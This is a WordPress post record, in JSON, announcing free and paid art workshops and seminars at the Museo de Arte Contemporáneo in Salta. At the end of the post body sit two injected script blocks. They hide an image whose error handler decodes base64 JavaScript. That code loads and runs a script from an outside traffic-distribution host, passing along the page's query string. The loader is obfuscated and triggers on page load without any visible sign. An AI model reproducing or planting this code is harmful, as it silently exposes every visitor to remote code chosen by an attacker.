{"id":2164,"date":"2023-02-03T12:46:26","date_gmt":"2023-02-03T15:46:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2164"},"modified":"2025-08-14T00:24:08","modified_gmt":"2025-08-14T03:24:08","slug":"el-mac-educa-y-entretiene-con-su-ciclo-de-talleres","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2164","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mac-educa-y-entretiene-con-su-ciclo-de-talleres-87643\">El MAC educa y entretiene con su ciclo de talleres<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#be9c3f\"><em>El Museo de Arte Contempor\u00e1neo (MAC), ofrece una variada gama de talleres art\u00edsticos y seminarios de diversa duraci\u00f3n para todas las edades.<\/em><\/h4>\n\n\n\n<p><strong>GRATUITO<\/strong><\/p>\n\n\n\n<p>&#8211; TALLER DE ARTE CREATIVO \u2013 x Silvina Troyano<\/p>\n\n\n\n<p>Modalidad: Taller de verano, en el marco de Vacaciones en Cultura<\/p>\n\n\n\n<p>D\u00edas: Mi\u00e9rcoles de febrero, 11 h<\/p>\n\n\n\n<p>Destinado a ni\u00f1os desde los 6 a\u00f1os.<\/p>\n\n\n\n<p>M\u00e1s info: 387 4373036<\/p>\n\n\n\n<p><strong>ARANCELADOS<\/strong><\/p>\n\n\n\n<p>&#8211; TALLER DE DIBUJO E HISTORIETA &nbsp;&#8211; x Eleonora Kortsarz<\/p>\n\n\n\n<p>Modalidad: Anual. Inicia: jueves 2 de febrero<\/p>\n\n\n\n<p>D\u00edas: Jueves, de 18 a 19.30 h<\/p>\n\n\n\n<p>Destinado a ni\u00f1os de 8 a 13 a\u00f1os<\/p>\n\n\n\n<p>M\u00e1s info: 3874429779<\/p>\n\n\n\n<p>&#8211; TALLER DE REALIZACI\u00d3N INTEGRAL DE COMICS \u2013 x Eleonora Kortsarz<\/p>\n\n\n\n<p>Modalidad: Anual. Inicia: Viernes 3 de febrero<\/p>\n\n\n\n<p>Destinado a mayores de 14 a\u00f1os<\/p>\n\n\n\n<p>D\u00edas: Viernes, de 18 a 19.30 h<\/p>\n\n\n\n<p>M\u00e1s info: 3874429779<\/p>\n\n\n\n<p>&#8211; SEMINARIO \u201cACERC\u00c1NDONOS AL COLOR\u201d \u2013 x Milagros D\u00b4Aiello<\/p>\n\n\n\n<p>7, 14, 21 y 28 de febrero, de 18 a 20 h<\/p>\n\n\n\n<p>Destinado a mayores de 18 a\u00f1os<\/p>\n\n\n\n<p>M\u00e1s info: 387 4582508<\/p>\n\n\n\n<p>&#8211; TALLER OBRAS A LA MANO \u2013 x Claudia Burgos<\/p>\n\n\n\n<p>Modalidad: 6 encuentros. Inicia: s\u00e1bado 4 de marzo<\/p>\n\n\n\n<p>D\u00edas: s\u00e1bados, de 10.30 a 12.30 h<\/p>\n\n\n\n<p>M\u00e1s info: 387 4510266<\/p>\n\n\n\n<p>Los esperamos, adem\u00e1s, para visitar las muestras vigentes: Perros de la Calle y Adquisiciones 1019-2022, de martes a s\u00e1bado, de 10 a 20 h, con entrada gratuita. Zuvir\u00eda 90.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mac-educa-y-entretiene-con-su-ciclo-de-talleres-87643\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Museo de Arte Contempor\u00e1neo (MAC), ofrece una variada gama de talleres art\u00edsticos y seminarios de diversa duraci\u00f3n para todas las edades. GRATUITO &#8211; TALLER DE ARTE CREATIVO \u2013 x Silvina Troyano Modalidad: Taller de verano, en el marco de Vacaciones en Cultura D\u00edas: Mi\u00e9rcoles de febrero, 11 h Destinado a ni\u00f1os desde los 6 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2165,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,9,17],"tags":[],"class_list":{"0":"post-2164","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-museos","9":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2164"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2164"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2164\/revisions"}],"predecessor-version":[{"id":7188,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2164\/revisions\/7188"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2165"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2164"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2164"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2164"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}